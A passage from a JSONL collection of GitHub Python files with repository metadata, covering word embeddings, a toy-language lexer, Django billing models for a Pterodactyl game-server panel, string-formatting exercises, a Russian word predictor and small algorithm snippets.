context_lookup_counts[pair]\n\n pmi_val = log(P_joint / (P_context * P_word))\n\n ppmi_matrix[i, j] = pmi_val if pmi_val > 0 else 0\n\n return word_lookup_counts, context_lookup_counts, ppmi_matrix\n\n\ndef calculate_edgeweights(embedding_mat):\n\n normed_embeddings = normalize(embedding_mat, norm='l2', axis=1)\n\n # return arccos(-normed_embeddings.dot(normed_embeddings.T))\n return normed_embeddings.dot(normed_embeddings.T)\n\n\n# TODO these variable names are bad: word index and word lookup...\ndef get_knn(word, edgeweight_mat, k, word_index_counts, word_lookup_table):\n word_idx = word_index_counts[word].index\n\n # get similarity vector from the edgeweight matrix\n word_sim_vec = edgeweight_mat[word_idx]\n k_best_indices = flipud(word_sim_vec.argsort())[:k]\n\n return [\n ((word, word_lookup_table[nn_idx]), edgeweight_mat[word_idx, nn_idx])\n for nn_idx in k_best_indices\n ]\n\n\nclass Embedding:\n\n matrix = None\n edgeweight_mat = None\n\n # we'll need to look up words by their indices and vice versa\n word_lookup_counts = None\n word_lookup = None\n index_lookup = None\n\n def __init__(self, matrix, word_lookup, index_lookup, U_full=None):\n '''\n Arguments:\n matrix (numpy.array): reduced U from SVD\n graph (networkx.Graph): k-nn graph representation of embeddings\n word_lookup (dict): (word, index) pairs for reverse lookups\n index_lookup (dict): (index, word) pairs for word lookups in matrix\n '''\n self.matrix = matrix\n self.word_lookup = word_lookup\n self.index_lookup = index_lookup\n\n @classmethod\n def from_ppmi(cls, ppmi, embedding_dim=300):\n\n word_lookup_counts = ppmi.word_lookup_counts\n\n word_lookup = {k: v.index for k, v in word_lookup_counts.items()}\n index_lookup = _index_lookup_table(word_lookup_counts)\n\n embeddings, _, _ = randomized_svd(ppmi.matrix, embedding_dim)\n\n new_embedding = cls(embeddings, word_lookup, index_lookup)\n\n new_embedding.word_lookup_counts = word_lookup_counts\n\n return new_embedding\n\n def make_edgeweight_mat(self):\n\n if self.matrix is None:\n raise RuntimeError('Must first create embedding matrix')\n\n self.edgeweight_mat = calculate_edgeweights(self.matrix)\n\n def generate_graph(self, k, words=None):\n\n if self.edgeweight_mat is None:\n self.edgeweight_mat = calculate_edgeweights(self.matrix)\n\n return make_graph(self.edgeweight_mat, k, self.word_lookup_counts,\n self.index_lookup, words=words)\n\n\nclass SemanticNetwork:\n\n def __init__(self, *args):\n return None\n\n\nclass PPMI:\n\n matrix = None\n word_lookup_counts = None\n\n def __init__(self, matrix, word_lookup_counts):\n self.matrix = matrix\n self.word_lookup_counts = word_lookup_counts\n\n @classmethod\n def from_texts(cls, texts, window_length=4, alpha=1.0, verbose=False):\n\n word_lookup_counts, _, matrix = \\\n _calculate_ppmi(texts, window_length, alpha, verbose=verbose)\n\n return cls(matrix, word_lookup_counts)\n\n\ndef make_graph(edges, k, word_index_counts, word_lookup_table, words=None):\n\n if words is None:\n words = word_index_counts.keys()\n\n G = nx.Graph()\n G.add_nodes_from(words)\n\n for i, word in enumerate(words):\n print('on word {} out of {}'.format(i, len(words)))\n try:\n knn = get_knn(word, edges, k, word_index_counts, word_lookup_table)\n # ignore weights for now\n G.add_edges_from([e[0] for e in knn])\n except KeyError:\n print('word {} not found'.format(word))\n\n return G\n\n\ndef _index_lookup_table(word_index_counts):\n\n return dict((wic.index, word) for word, wic in word_index_counts.items())\n\n\ndef build_network(texts, alpha=0.75, verbose=False):\n\n if verbose:\n print('building PPMI matrix')\n ppmi = PPMI.from_texts(texts, alpha=alpha)\n\n if verbose:\n print('calculating embedding via randomized SVD')\n embedding = Embedding.from_ppmi(ppmi)\n\n if verbose:\n print('calculating edgeweight matrix')\n embedding.make_edgeweight_mat()\n\n return ppmi, embedding\n","repo_name":"mt-digital/semantic-cable","sub_path":"build_network.py","file_name":"build_network.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"43067231553","text":"import re\nimport sys\n\n#----------------------------\ndef counter():\n '''\n :return: a generator for counting\n '''\n\n i = 0\n while True:\n yield i\n i = i + 1\n\n\nclass Lexer(object):\n '''\n Our Lexer class for classifying tokens.\n '''\n\n # list of token constants\n cnt = counter()\n FILE_NOT_FOUND_ERROR = next(cnt)\n PLUS = next(cnt)\n LPAREN = next(cnt)\n RPAREN = next(cnt)\n INTLIT = next(cnt)\n FLOATLIT = next(cnt)\n BOOL = next(cnt)\n ID = next(cnt)\n EQ_EQ = next(cnt)\n EQ = next(cnt)\n MINUS = next(cnt)\n TIMES = next(cnt)\n DIV = next(cnt)\n OR = next(cnt)\n AND = next(cnt)\n NEQ = next(cnt)\n LTEQ = next(cnt)\n LT = next(cnt)\n GTEQ = next(cnt)\n GT = next(cnt)\n MOD = next(cnt)\n NOT = next(cnt)\n SEMI = next(cnt)\n COM = next(cnt)\n LCBRACK = next(cnt)\n RCBRACK = next(cnt)\n LBRACK = next(cnt)\n RBRACK = next(cnt)\n REALNUM = next(cnt)\n STR = next(cnt)\n KEY = next(cnt)\n PRINT = next(cnt)\n IF = next(cnt)\n WHILE = next(cnt)\n INT = next(cnt)\n FLOAT = next(cnt)\n MAIN = next(cnt)\n ELSE = next(cnt)\n TRUELIT = next(cnt)\n FALSELIT = next(cnt)\n POWER = next(cnt)\n END_OF_FILE = next(cnt)\n\n\n # token dictionary for punctuation and operators\n td = {\n '+' : PLUS,\n '==': EQ_EQ,\n '=' : EQ,\n '(' : LPAREN,\n ')' : RPAREN,\n '-' : MINUS,\n '#' : POWER,\n '*' : TIMES,\n '/' : DIV,\n '||': OR,\n '&&': AND,\n '!=': NEQ,\n '<=': LTEQ,\n '<' : LT,\n '>=': GTEQ,\n '>' : GT,\n '%' : MOD,\n '!' : NOT,\n ';' : SEMI,\n ',' : COM,\n '{' : LCBRACK,\n '}' : RCBRACK,\n '[' : LBRACK,\n ']' : RBRACK,\n 'intlit' : INTLIT,\n 'floatlit' : FLOATLIT,\n 'true' : TRUELIT,\n 'false' : FALSELIT,\n 'int' : INT,\n 'float' : FLOAT,\n 'main' : MAIN,\n 'bool' : BOOL,\n 'key' : KEY,\n 'id' : ID,\n 'while' : WHILE,\n 'if' : IF,\n 'print' : PRINT,\n 'End of File' : END_OF_FILE\n }\n\n # Map from token values to token names\n name = {\n '+': \"PlUS\",\n '==': \"EQ-EQ\",\n '=' : 'EQUAL',\n '(': 'LPAREN',\n ')' : 'RPAREN',\n '-': 'MINUS',\n '#' : 'POWER',\n '*' : 'TIMES',\n '/' : 'DIVIDE',\n '||' : 'OR',\n '&&' : 'AND',\n '!=' : 'NEQ',\n '<' : 'LT',\n '<=' : 'LEQ',\n '>' : 'GT',\n '>=' : 'GEQ',\n '%' : 'MOD',\n '!' : 'NOT',\n ';' : 'SEMI',\n ',' : 'COMMA',\n '{' : 'LBRACE',\n '}' : 'RBRACE',\n '[' : 'LBRACK',\n ']' : 'RBRACK'\n }\n\n # regex patterns for splitting a line\n split_patt = re.compile(\n '''\n \\s | # whitespace\n (\".*?\") | # String\n (\"\\@\") | # Comment\n (\\() | # left paren\n (\\)) | # right paren\n (\\+) | # plus\n (\\-) | # minus\n (\\{) | # left brace\n (\\}) | # right brace\n (\\,) | # comma\n (\\=\\=)| # equal comparator\n (\\=) | # equal\n (\\*) | # times\n (\\|\\|) | # or\n (\\&\\&) | # and\n (\\/) | # divide\n (\\!\\=) | # not equal\n (\\<\\=) | # less than or equal to\n (\\<) | # less than\n (\\>\\=) | # greater than or equal to\n (\\>) | # greater than\n (\\%) | # mod\n (\\!) | # not\n (\\;) | # colon\n (\\[) | # left bracket\n (\\]) # right bracket\n ''', re.VERBOSE)\n\n # regex for an identifier\n id_patt = re.compile(\"^[a-zA-Z_]\\w*$\")\n\n # regex for an integer\n int_patt = re.compile(\"^\\d+$\")\n\n # regex for a real number\n real_patt = re.compile(\"^\\d+\\.\\d+$\")\n\n #regex for string\n str_patt = re.compile('\\\"(.+?)\\\"')\n\n # regex for comment\n com_patt = re.compile(\"@\")\n\n # regex for keyword\n key_patt = re.compile(\"^bool$|^else$|^false$|^if$|^true$|^float$|^int$|^while$|^print$\")\n\n\n def token_generator(self,filename):\n '''\n Our token generator.\n :param filename: name of course program file\n :return: a generator\n '''\n try:\n file = open(filename)\n except IOError:\n print(\"File \"+ filename+ \" not found\")\n yield (Lexer.FILE_NOT_FOUND_ERROR, \"Cannot open file\")\n sys.exit()\n\n count = counter()\n lineNumber = next(count)\n # for every line in the file\n for line in file:\n line = line.replace(\"//\", '@')\n line = line.replace(\"**\", '#')\n # split a line based on our split pattern and filter\n # all of the empty strings and None values.\n tokens = Lexer.split_patt.split(line)\n tokens = [x for x in tokens if x]\n\n # for each possible token in the line\n for tok in tokens:\n v = Lexer.td.get(tok, False)\n if v:\n yield (Lexer.td[tok], tok, lineNumber+1)\n elif Lexer.key_patt.search(tok):\n yield (Lexer.td['key'], tok, lineNumber+1)\n elif Lexer.id_patt.search(tok):\n yield (Lexer.td['id'], tok, lineNumber+1)\n elif Lexer.int_patt.search(tok):\n yield (Lexer.td['intlit'], tok, lineNumber+1)\n elif Lexer.real_patt.search(tok):\n yield (Lexer.td['floatlit'], tok, lineNumber+1)\n elif Lexer.str_patt.search(tok):\n tok = tok.replace('@', '//')\n yield (Lexer.td[tok], tok, lineNumber + 1)\n elif Lexer.com_patt.search(tok):\n break\n else:\n yield (\"Unrecognized character\", str(tok), \"on line \" + str(lineNumber+1))\n lineNumber += 1\n\n #while True:\n yield (Lexer.END_OF_FILE, Lexer.END_OF_FILE, Lexer.END_OF_FILE)\n","repo_name":"tjpell/C-Lite","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35731787160","text":"from dataclasses import dataclass\nfrom pymongo import MongoClient\nimport os, sys\n\n@dataclass\nclass EnvironmentVariable:\n mongo_db_url:str = os.getenv(\"MONGO_DB_URL\")\n\n\nenv_var = EnvironmentVariable()\nmongo_client = MongoClient(env_var.mongo_db_url)\n\nTARGET_COLUMN = \"Rating\"\nPREDICTOR_FLOAT_COLUMN = \"Average Cost for two\"\nPREDICTOR_INT_CLOUMNS_LIST = [\"Votes\", \"Price range\"]\nPREDICTOR_CATEGORICAL_COLUMNS_LIST = ['Has Table booking','Has Online delivery']\nPREDICTOR_COLUMNS_LIST = ['Votes','Average Cost for two','Has Table booking','Has Online delivery','Price range']\nREQUIRED_CLOUMNS_LIST = ['Votes','Average Cost for two','Has Table booking','Has Online delivery','Price range','Rating']\n","repo_name":"rahulchatt26/restraunt-rating-prediction","sub_path":"restaurant/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10089819552","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^move/?$',views.move,name='move'),\n url(r'^update_beacon/?$',views.update_beacon,name='update_beacon'),\n url(r'^update_direction/?$',views.update_direction,name='update_direction'),\n]","repo_name":"sandeep6189/bezirk-hackathon","sub_path":"berzik_golf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29241745299","text":"s = 'Строковый тип'\ndef view_list(*args):\n print()\n for a_s in args:\n print(a_s)\n\nview_list('Понедельник','Вторник','Среда','Четверг','Пятница','Суббота','Воскресенье')\nview_list(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15)\nview_list('Север',2020,200.5,True,'Арбуз')\n\ndef view_n_list(**kwargs):\n print()\n for key, val in kwargs.items():\n print(key,': [',val,']')\n\nview_n_list(brand='Sony',year=2018,price=1000.50)\n\nvacuum_cleaner_brand = 'AnyName'\ndiscount = 0.15\nprice = 10000.00\nprint('На пылесосы {0} действует скижка {1}% Стоимость пылесоса со скидкой: {2}'.\n format(vacuum_cleaner_brand,\n round(discount*100),\n price*(1-discount)))\n\ns = 'Строка'\nn = 12345\nf = 200.55\nb = True\nfull_str = 'булев: {3}, строковый: {0}, дробный: {2}, целочисленный: {1}'.format(s,n,f,b)\nprint(full_str)\n\nprint('{0}, {0}, {0}, {0}, {0}'.format(123))\nprint('{}, {}, {}, {}, {}'.format(1,2,'Три',True,'Пять'))\nprint('{}{}'.format('Строка1','Строка2'))\n\n\nprint()\n# форматирование матрицы степеней чисел\nfor i in range(1,11):\n for j in range(1,11):\n print('{:>12}'.format(i**j),end=('\\n',' ')[j<10])\n\nprint('десятичный:{0:d}\\nдвоичный:{0:b}\\n8-ричный:{0:o}\\n16-ричный:{0:X}\\nс плавающей точкой:{0:10.2f}'.format(32767))\n\n# расчет зарплаты на руки с учетом налога\nincome = 50000.00 # сумма без вычета налога\ntax = 0.13 # процент налога\namount_in_hand = income * (1.0-tax)\n\nprint('\\nДоход: {:,.2f}\\nНалог: {:.2%}\\nСумма на руки: {:,.2f}'.format(income,tax,amount_in_hand))\n\n# таблица умножения\nhorizontal_line = '-'*73\nprint('\\n{:^73}\\n'.format('Таблица умножения'))\n# формирование строк\nfor i in range(0,11):\n # формирование одной строки\n for j in range(0,11):\n # одна итерация цикла формирует одну ячейку таблицы\n if (i==0):\n # формирование строки с номерами столбцов\n print(('{:>6}'.format(j), ' '*3)[j == 0], end=('\\n', ' ')[j < 10])\n else:\n if (j > 0):\n # формирование ячейки для результата умножения ном��ра строки на номер столбца\n print('{:>6}'.format(j*i),end=('\\n', ' ')[j < 10])\n else:\n # формирвоание очередного номера строки в левом столбце\n print('{:>2}'.format(i), end=' ')\n if (i == 0):\n # верхняя разделительная линия\n print(horizontal_line)\n# нижняя разделительная линия\nprint(horizontal_line)\n","repo_name":"AlchiProMent/PyBeginner","sub_path":"02_ClassesAndObjects/strObj.py","file_name":"strObj.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13545864211","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport csv\nfrom datetime import datetime\n\n\nquote_page = 'https://www.amazon.in/BassHeads-225-Super-Extra-Headphones/dp/B01M9C51T9/ref=zg_bs_electronics_6?_encoding=UTF8&psc=1&refRID=8ZQC04R246AH7877MFZD'\npage= urlopen(quote_page)\nsoup = BeautifulSoup(page,'html.parser')\nProduct_title = soup.find('span', attrs={'class':'a-size-large'})\ntitle=Product_title.text.strip()\n\n\nprint(title)\ndataArr = [title]\n\nwith open('index.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(dataArr)\n#sys.exit()\ncsvFile.close()\n","repo_name":"ankit1812/python_scrapping","sub_path":"amazonData.py","file_name":"amazonData.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23863160273","text":"import numpy as np\nimport pyopencl as cl\n\n\nclass BaseClassifier:\n def __init__(self, program_file, minimize, descriptors_dict, dev_idx=-1):\n self.platform = cl.get_platforms()[0]\n self.context = cl.Context([self.platform.get_devices()[dev_idx]])\n self.program = cl.Program(self.context, open(program_file).read()).build()\n self.cl_descriptors = {costume: [cl.image_from_array(self.context, de, 4, mode='r') for de in des]\n for costume, des in descriptors_dict.items()}\n self.queue = cl.CommandQueue(self.context)\n self.minimize = minimize\n\n def predict(self, sample_set):\n cl_sample_set = [cl.image_from_array(self.context, sample, 4, mode='r')\n if sample is not None else None for sample in sample_set]\n\n # predict score of each sample, mean of every color channel summed up over all cutouts\n # numpy's float32 is not serializable, thus, cast to python native float\n return {costume_id: float(np.sum(\n [np.mean(self.distance(des[i // 2], sample)) for i, sample in enumerate(cl_sample_set) if sample is not None]))\n for costume_id, des in self.cl_descriptors.items()}\n\n\nclass MseClassifier(BaseClassifier):\n KERNEL_PATH = 'resources/kernels/mean_squared_error.opencl'\n\n def __init__(self, descriptors_dict, dev_idx=-1):\n super().__init__(MseClassifier.KERNEL_PATH, True, descriptors_dict, dev_idx)\n\n def distance(self, cl_target, cl_query):\n out_dims = (cl_query.shape[0] // 4) * 2 + 1, (cl_query.shape[1] // 4) * 2 + 1\n dest = cl.Image(self.context, cl.mem_flags.WRITE_ONLY,\n cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT),\n shape=(out_dims[0], out_dims[1], 11))\n self.program.mse(self.queue, dest.shape, None,\n cl_target, np.array(cl_target.shape, dtype=np.int32),\n cl_query, np.array(cl_query.shape, dtype=np.int32),\n dest, np.array(dest.shape[:2], dtype=np.int32)).wait()\n out = np.empty((11, dest.shape[1], dest.shape[0], 4), dtype=np.float32)\n cl.enqueue_copy(self.queue, out, dest, origin=(0, 0), region=dest.shape)\n distance_space = out[:, :, :, :3]\n\n reduced_distance_space = np.nansum(distance_space, axis=3)\n rot_i, ty_i, tx_i = np.unravel_index(np.nanargmin(reduced_distance_space), reduced_distance_space.shape)\n return distance_space[rot_i, ty_i, tx_i]\n\n def __str__(self):\n return 'Mean Squared Error classifier, number of classes: %s' % len(self.cl_descriptors)\n \n\nclass CcClassifier(BaseClassifier):\n KERNEL_PATH = 'resources/kernels/correlation_coefficient.opencl'\n\n def __init__(self, descriptors_dict, dev_idx=-1):\n super().__init__(CcClassifier.KERNEL_PATH, False, descriptors_dict, dev_idx)\n\n def distance(self, cl_target, cl_query):\n out_dims = (cl_query.shape[0] // 4) * 2 + 1, (cl_query.shape[1] // 4) * 2 + 1\n img1avg = cl.Image(self.context, cl.mem_flags.READ_WRITE,\n cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT),\n shape=(out_dims[0], out_dims[1], 11))\n img2avg = cl.Image(self.context, cl.mem_flags.READ_WRITE,\n cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT),\n shape=(out_dims[0], out_dims[1], 11))\n corrco = cl.Image(self.context, cl.mem_flags.WRITE_ONLY,\n cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT),\n shape=(out_dims[0], out_dims[1], 11))\n self.program.avg(self.queue, img1avg.shape, None,\n cl_target, np.array(cl_target.shape, dtype=np.int32),\n cl_query, np.array(cl_query.shape, dtype=np.int32),\n img1avg, img2avg, np.array(img1avg.shape[:2], dtype=np.int32)).wait()\n self.program.corr(self.queue, img1avg.shape, None,\n cl_target, np.array(cl_target.shape, dtype=np.int32),\n cl_query, np.array(cl_query.shape, dtype=np.int32),\n img1avg, img2avg, corrco, np.array(img1avg.shape[:2], dtype=np.int32)).wait()\n out = np.empty((11, img2avg.shape[1], img2avg.shape[0], 4), dtype=np.float32)\n cl.enqueue_copy(self.queue, out, corrco, origin=(0, 0), region=img2avg.shape)\n distance_space = out[:, :, :, :3]\n\n reduced_distance_space = np.nansum(distance_space, axis=3)\n rot_i, ty_i, tx_i = np.unravel_index(np.nanargmax(reduced_distance_space), reduced_distance_space.shape)\n return distance_space[rot_i, ty_i, tx_i]\n\n def __str__(self):\n return 'Correlation Coefficient classifier, number of classes: %s' % len(self.cl_descriptors)\n","repo_name":"RTiK/swiss-traditional-costume-classification","sub_path":"classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"22663094744","text":"class Solution(object):\n\tdef moveZeroes(self, nums):\n\t\t\"\"\"\n\t\t:type nums: List[int]\n\t\t:rtype: void Do not return anything, modify nums in-place instead.\n\t\t\"\"\"\n\t\tif not nums:\n\t\t\treturn nums\n\t\t\n\t\tleft = 0\n\t\tright = 0\n\n\t\twhile right < len(nums):\n\t\t\twhile right < len(nums) and nums[right] == 0:\n\t\t\t\tright += 1\n\t\t\tif right == len(nums):\n\t\t\t\tbreak\n\t\t\tnums[left] = nums[right]\n\t\t\tleft += 1\n\t\t\tright += 1\n\t\twhile left < len(nums):\n\t\t\tnums[left] = 0\n\t\t\tleft += 1\n","repo_name":"xzjh/OJ_LeetCode","sub_path":"move-zeroes.py","file_name":"move-zeroes.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36797885388","text":"from typing_extensions import Required\nfrom django.contrib import admin\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom .pterodactyl import Pterodactyl\nimport json\nfrom . import notify\nfrom django.utils import timezone\n\nfrom BillDash import pterodactyl\n\npterodactyl = Pterodactyl(\n json.load(open(\"secrets.json\"))[\"pterodactyl_token\"],\n json.load(open(\"secrets.json\"))[\"pterodactyl_url\"],\n)\n\n# Create your models here.\nclass Customer(models.Model):\n user = models.OneToOneField(\n User, null=True, blank=True, on_delete=models.PROTECT, default=None\n )\n name = models.CharField(max_length=25)\n ptero_id = models.IntegerField(blank=True, null=True, default=None)\n\n def __str__(self) -> str:\n return self.name\n\n def email(self):\n return self.user.email\n\n def save(self, *args) -> None:\n if self.ptero_id is not None:\n return super().save(*args)\n res = pterodactyl.create_new_user(\n self.user.email,\n self.user.username,\n self.user.first_name,\n self.user.last_name,\n )\n if res is None:\n return print(\"Error creating customer\")\n self.ptero_id = int(res[\"attributes\"][\"id\"])\n return super().save(*args)\n\n def delete(self, *args):\n if pterodactyl.delete_user(self.ptero_id):\n return super().delete(*args)\n return print(\"Error deleting customer\")\n\n\nclass Bill(models.Model):\n bill_number = models.AutoField(primary_key=True)\n server = models.ForeignKey(\"Server\", on_delete=models.SET_NULL, null=True)\n currency = models.CharField(max_length=3)\n amount = models.DecimalField(max_digits=10, decimal_places=2, default=0)\n creation_date = models.DateTimeField(auto_now_add=True)\n due_date = models.DateTimeField()\n paid = models.BooleanField(default=False)\n\n def __str__(self) -> str:\n try:\n return f\"{self.server.customer} - {self.due_date.isoformat()}\"\n except:\n return f\"{self.server} - {self.due_date.isoformat()}\"\n\n def save(self, *args) -> None:\n if (not self._state.adding) and self.paid:\n self.server.next_payment_date += timezone.timedelta(days=30)\n if self.server.suspended:\n self.server.suspended = False\n self.server.save()\n notify.bill_paid(self)\n return super().save(*args)\n if self.amount > 0:\n notify.new_bill(self)\n return super().save(*args)\n self.amount = self.server.plan.price\n notify.new_bill(self)\n return super().save(*args)\n \n def delete(self, *args):\n notify.bill_delete(self)\n return super().delete(*args)\n\n\nclass Location(models.Model):\n name = models.CharField(max_length=25)\n ptero_id = models.IntegerField(blank=True, null=True, default=None)\n\n def __str__(self) -> str:\n return self.name\n\n\nclass Plan(models.Model):\n ram = models.IntegerField(default=0)\n cpu = models.IntegerField(default=0)\n disk = models.IntegerField(default=0)\n price = models.DecimalField(max_digits=10, decimal_places=2)\n name = models.CharField(max_length=25)\n network_allocations = models.IntegerField(default=1)\n backups = models.IntegerField(default=0)\n databases = models.IntegerField(default=0)\n location = models.ForeignKey(Location, on_delete=models.PROTECT, default=None)\n dedicated_ip = models.BooleanField(default=False)\n\n def __str__(self):\n return self.name\n\n\nclass ServerSoftware(models.Model):\n name = models.CharField(max_length=25)\n game_name = models.CharField(max_length=25)\n ptero_nest_id = models.IntegerField(blank=False, null=False)\n ptero_egg_id = models.IntegerField(blank=False, null=False)\n docker_image = models.CharField(max_length=25, blank=True, null=True)\n startup_command = models.CharField(max_length=1000, blank=True, null=True)\n environment = models.CharField(max_length=1000, blank=True, null=True)\n\n def __str__(self) -> str:\n return f\"{self.game_name} - {self.name}\"\n\n def save(self, *args) -> None:\n resp = pterodactyl.get_egg_info(self.ptero_nest_id, self.ptero_egg_id)\n if not resp:\n return \"Error getting egg info\"\n self.docker_image = resp[\"attributes\"][\"docker_image\"]\n env = {}\n for var in resp[\"attributes\"][\"relationships\"][\"variables\"][\"data\"]:\n env[f\"{var['attributes']['env_variable']}\"] = var[\"attributes\"][\n \"default_value\"\n ]\n self.environment = json.dumps(env)\n self.startup_command = resp[\"attributes\"][\"startup\"]\n return super().save(*args)\n\n\nclass Server(models.Model):\n server_id = models.IntegerField()\n server_id_hex = models.CharField(max_length=10, blank=True, null=True, default=None)\n customer = models.ForeignKey(Customer, on_delete=models.PROTECT)\n creation_date = models.TimeField(auto_now=True)\n plan = models.ForeignKey(Plan, on_delete=models.PROTECT)\n next_payment_date = models.DateTimeField(null=True, blank=True)\n server_software = models.ForeignKey(\n ServerSoftware, on_delete=models.PROTECT, default=None\n )\n suspended = models.BooleanField(default=False)\n\n def __str__(self):\n return self.server_id_hex\n\n def name(self):\n res = pterodactyl.get_server_info(self.server_id)\n if not res:\n return \"Error getting server info\"\n return res[\"attributes\"][\"name\"]\n\n def save(self, *args):\n if not self._state.adding:\n if not self.suspended:\n notify.unsuspend_server(self)\n pterodactyl.unsuspend_server(self.server_id)\n if self.suspended:\n notify.suspend_server(self)\n pterodactyl.suspend_server(self.server_id)\n return super().save(*args)\n if self.server_id is not None:\n self.server_id_hex = pterodactyl.get_server_info(self.server_id)[\n \"attributes\"\n ][\"identifier\"]\n return super().save(*args)\n specs = {\n \"name\": f\"{self.customer.name}-{self.plan.name}\",\n \"user\": self.customer.ptero_id,\n \"egg\": self.server_software.ptero_egg_id,\n \"docker_image\": self.server_software.docker_image,\n \"startup\": self.server_software.startup_command,\n \"environment\": json.loads(self.server_software.environment),\n \"limits\": {\n \"memory\": self.plan.ram,\n \"swap\": -1,\n \"disk\": self.plan.disk,\n \"io\": 500,\n \"cpu\": self.plan.cpu,\n },\n \"feature_limits\": {\n \"databases\": self.plan.databases,\n \"backups\": self.plan.backups,\n \"allocations\": self.plan.network_allocations,\n },\n \"deploy\": {\n \"location\": [self.plan.location.ptero_id],\n \"dedicated_ip\": self.plan.dedicated_ip,\n },\n }\n res = pterodactyl.create_new_server(\n specs[\"name\"],\n specs[\"user\"],\n specs[\"egg\"],\n specs[\"docker_image\"],\n specs[\"startup\"],\n specs[\"environment\"],\n specs[\"limits\"],\n specs[\"feature_limits\"],\n specs[\"deploy\"][\"location\"],\n specs[\"deploy\"][\"dedicated_ip\"],\n )\n if res == None:\n return print(\"Error creating server\")\n self.server_id = res[\"attributes\"][\"id\"]\n self.server_id_hex = res[\"attributes\"][\"identifier\"]\n notify.new_server(self)\n return super().save(*args)\n\n def delete(self, *args):\n pterodactyl.delete_server(self.server_id)\n notify.delete_server(self)\n return super().delete(*args)\n","repo_name":"vachanmn123/IvyBill","sub_path":"BillDash/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"16609992223","text":"import random\nimport codecs\n\nletters = {\n \"Left\": \"йцуфывячс\",\n \"Right\": \"нгшролть\",\n \"Forward\": \"щзхъджэбю\",\n \"Backward\": \"кеапми\",\n}\n\nletters_encoding = {\"й\":1, \"ц\":1, \"у\":1, \"ф\":1, \"ы\":1, \"в\":1, \"ы\":1,\"в\":1, \"я\":1,\"ч\":1, \"с\":1,\"к\":2,\"е\":2, \"ё\":2, \"а\":2,\"п\":2,\"м\":2,\"и\":2,\n\"н\":3,\"г\":3,\"ш\":3,\"р\":3,\"о\":3,\"л\":3,\"т\":3,\"ь\":3, \"-\":3, \"щ\":4,\"з\":4,\"х\":4,\"ъ\":4,\"д\":4,\"ж\":4,\"э\":4,\"б\":4,\"ю\":4}\n\ndef encode_word(word: str) -> str: \n numeral_performance = \"\"\n word = word.rstrip()\n for i in word:\n numeral_performance += str(letters_encoding[i])\n return numeral_performance\n\ndef read_dict() -> dict:\n with codecs.open(\"word_rus.txt\", encoding='utf-8') as f:\n lines = f.readlines()\n d = {}\n for line in lines:\n line = line.strip()\n d[line] = encode_word(line)\n return d\n\nword = \"\"\npred1 = \"\"\npred2 = \"\"\ntext = \"\"\npdict = read_dict()\n\ndef search_word(numeric: int) -> list:\n global pdict\n output = []\n for item, value in pdict.items():\n if value.startswith(numeric):\n output.append(item)\n output = sorted(output, key=len)\n return output \n\ndef get_text(selection: str = \"\") -> str:\n global text\n if selection != \"\":\n text += f\"{selection} \"\n return text \n return text + word\n\ndef get_letter(motion: str) -> str: \n global letters\n group = letters[motion]\n letter = group[random.randint(0, len(group) - 1)]\n return letter\n\ndef get_word(letter: str) -> str:\n global word\n return word + letter\n\ndef get_predictions(letter: str = \"\") -> list:\n global word, pred1, pred2\n if letter == \"\":\n copy1 = pred1\n copy2 = pred2\n word = pred1 = pred2 = \"\"\n return [copy1, copy2]\n\n word += letter\n preds = search_word(encode_word(word))\n if len(preds) == 0:\n pred1 = word + letter\n pred2 = word + letter\n elif len(preds) == 1:\n pred1 = preds[0]\n pred2 = word + letter\n else:\n pred1 = preds[0]\n pred2 = preds[1]\n \n return [pred1, pred2]\n ","repo_name":"dmitriykara/Accelerometer","sub_path":"server/server/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5317361425","text":"from timer import timed\n\nprint(\"---fib-------\")\ndef fib(n):\n print('calc fib({0})'.format(n))\n return 1 if n < 3 else fib(n-1) + fib(n-2)\n\nfib(10)\n\nprint(\"---fib1-------\")\n\ndef fib1():\n cache = {1:1, 2:1}\n def calc_fib(n):\n if n not in cache:\n print('calc fib({0})'.format(n))\n cache[n] = calc_fib(n-1) + calc_fib(n-2)\n return cache[n]\n return calc_fib\n\ng = fib1()\ng(10)\n\nprint(\"---fib2-------\")\n\ndef memoize(fn):\n cache = dict()\n def inner(n):\n if n not in cache:\n print('calc fib({0})'.format(n))\n cache[n] = fn(n)\n return cache[n]\n return inner\n\n\n@memoize\ndef fib2(n):\n return 1 if n < 3 else fib2(n-1) + 